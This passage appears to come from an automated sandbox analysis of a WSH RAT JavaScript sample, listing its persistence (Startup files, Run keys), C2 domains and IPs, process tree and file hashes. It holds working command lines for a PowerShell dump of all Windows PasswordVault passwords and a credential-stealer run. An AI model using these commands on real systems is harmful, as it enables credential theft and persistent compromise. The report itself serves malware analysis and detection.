File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js | C:\Windows\system32\wscript.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js | C:\Windows\system32\wscript.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js | C:\Windows\System32\wscript.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js | C:\Windows\System32\wscript.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = wscript.exe //B "C:\Users\Admin\AppData\Local\Temp\FCR22001306.js" | C:\Windows\system32\wscript.exe | N/A
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = wscript.exe //B "C:\Users\Admin\AppData\Local\Temp\FCR22001306.js" | C:\Windows\system32\wscript.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Script User-Agent

Description: HTTP User-Agent header (4 identical entries)
Indicator: WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands
Process: N/A
Target: N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Events
PID 1128 wrote to memory of 4380 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe | 2

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"

Network

Identical rows collapsed; Connections is the number of times the row appeared. "-" marks rows the report lists without a domain.

Country | Destination | Domain | Proto | Connections
US | 8.8.8.8:53 | f.7.6.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa | udp | 1
US | 8.8.8.8:53 | ip-api.com | udp | 1
US | 8.8.8.8:53 | javaautorun.duia.ro | udp | 1
US | 208.95.112.1:80 | ip-api.com | tcp | 1
NG | 41.217.12.189:5465 | javaautorun.duia.ro | tcp | 6
US | 8.8.8.8:53 | egodds.longmusic.com | udp | 1
JP | 172.93.220.135:2084 | egodds.longmusic.com | tcp | 13
US | 8.8.8.8:53 | wshsoft.company | udp | 1
SG | 194.59.164.67:80 | wshsoft.company | tcp | 1
GB | 51.132.193.104:443 | - | tcp | 1
NL | 87.248.202.1:80 | - | tcp | 2

Files

memory/4380-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js

MD5 18aa18aca1d624556d87fd1c3c8dfc4a
SHA1 45509a074cd5f5d11d507a7fe0bcb733f874e90d
SHA256 27765e27d897d45fb5cc093197a65545ed4a120130e12cc88e70f41e68788036
SHA512 80e7fcc1551290772a960b76445999f85f5cbef24cf2b860c7d8e0e7ea1a2a284e8b120a203947c2e8f2cdff13193095c00922e6f7e7cc94069e8846bad4554a

memory/2336-134-0x0000000000000000-mapping.dmp

memory/2336-135-0x000002147B220000-0x000002147B242000-memory.dmp

memory/2336-136-0x000002147B250000-0x000002147B25A000-memory.dmp

memory/2336-137-0x00007FFAD8B90000-0x00007FFAD9651000-memory.dmp

memory/2336-138-0x000002147CB80000-0x000002147CB88000-memory.dmp

memory/2336-139-0x00007FFAD8B90000-0x00007FFAD9651000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c416c12d1b2b1da8c8655e393b544362
SHA1 fb1a43cd8e1c556c2d25f361f42a21293c29e447
SHA256 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046
SHA512 cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c

memory/3196-141-0x0000000000000000-mapping.dmp

memory/4952-142-0x0000000000000000-mapping.dmp

memory/1680-144-0x0000000000000000-mapping.dmp

memory/732-143-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

memory/4024-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

MD5 70e69155b8080b5db35191ab8426d084
SHA1 383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512 c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

memory/3236-149-0x0000000000000000-mapping.dmp